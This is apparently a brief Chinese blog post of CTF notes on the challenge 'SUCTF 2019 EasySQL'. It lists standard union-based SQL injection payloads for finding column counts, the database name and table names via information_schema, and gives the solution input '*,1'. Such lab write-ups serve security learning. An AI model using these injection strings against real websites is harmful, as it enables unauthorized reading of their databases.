[SUCTF 2019]EasySQL 1 做题笔记

发布时间 2023-06-03 16:21:33作者: 沙漠里的海盗

 题目考察的是SQL注入,先找一些常用的SQL命令

1.判断注入类型:
简单的注入类型有字符型和数字型

2.判断列数

?id =1’ orderby 4 #
?id =1' union select 1,2 ,3 #

3.判断库名

?id=1' union select 1,database(),3 #

4.判断表名

?id=1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() #

待补充..........

这题的解法参考网上的

输入的内容为*,1

 
得到flag